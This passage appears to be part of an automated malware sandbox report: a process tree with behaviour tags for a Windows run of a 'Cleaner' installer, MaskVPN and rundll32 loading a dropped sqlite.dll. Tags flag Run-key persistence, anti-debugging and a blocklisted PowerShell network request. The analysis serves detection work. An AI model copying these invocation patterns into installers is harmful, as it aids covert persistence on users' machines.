                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 9394E326F676600C11B0AEFDA711C65F C
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          PID:4108
                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding F8553DC96A2E2D5335FCBF4539464CE5 C
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          PID:7492
                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 8EE09CA22E1E34C91B6FDD55A5656DE0 C
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          PID:5940
                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding BA3F17889BBBAE9CD9B969AD0D5C9D85
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:6788
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                                                            PID:8552
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:6440
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                                                  PID:6444
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffdc337dec0,0x7ffdc337ded0,0x7ffdc337dee0
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:7788
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff77ece9e70,0x7ff77ece9e80,0x7ff77ece9e90
                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                          PID:7320
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1672,2375980213867048424,11918424081052352998,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6444_805919071" --mojo-platform-channel-handle=1752 /prefetch:8
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:9036
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1672,2375980213867048424,11918424081052352998,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6444_805919071" --mojo-platform-channel-handle=2068 /prefetch:8
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                          PID:9152
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1672,2375980213867048424,11918424081052352998,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6444_805919071" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1692 /prefetch:2
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:8768
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1672,2375980213867048424,11918424081052352998,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6444_805919071" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2640 /prefetch:1
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                            PID:7396
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1672,2375980213867048424,11918424081052352998,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6444_805919071" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2628 /prefetch:1
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                            PID:6832
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,2375980213867048424,11918424081052352998,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6444_805919071" --mojo-platform-channel-handle=3244 /prefetch:8
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:8060
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1672,2375980213867048424,11918424081052352998,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6444_805919071" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3220 /prefetch:2
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:8300
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,2375980213867048424,11918424081052352998,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6444_805919071" --mojo-platform-channel-handle=1776 /prefetch:8
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:6424
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,2375980213867048424,11918424081052352998,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6444_805919071" --mojo-platform-channel-handle=3420 /prefetch:8
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                                                                  PID:6440
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,2375980213867048424,11918424081052352998,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6444_805919071" --mojo-platform-channel-handle=3416 /prefetch:8
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:9096
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1672,2375980213867048424,11918424081052352998,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6444_805919071" --mojo-platform-channel-handle=392 /prefetch:8
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                      PID:7896
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_4933.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                  PID:8256
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                              PID:5712
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                PID:6576
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                              PID:8052
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                PID:1236
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:7880
                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                PID:6740
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                PID:5276
                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                PID:5084
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{691cc019-0e2e-364f-9f7b-8a73061dde34}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                  PID:7276
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000120"
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:7876
                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                  PID:7224
                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:7788
                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                    PID:4572
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                      PID:8052
                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                    PID:5216
                                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                                                                                    PID:6120
                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                    PID:8100
                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                      MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:9152
                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:5992
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:6816
                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                          PID:68
                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                          PID:9104
                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                          PID:8776
                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                          PID:8752
                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                          PID:6980
                                                                                                                                                                                                                                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:8288
                                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                            PID:8788
                                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k localservice -s LicenseManager
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                            PID:6788
                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:4196
                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:8164
                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                PID:7532
                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                PID:3380
                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                PID:6688
                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                PID:2108
                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
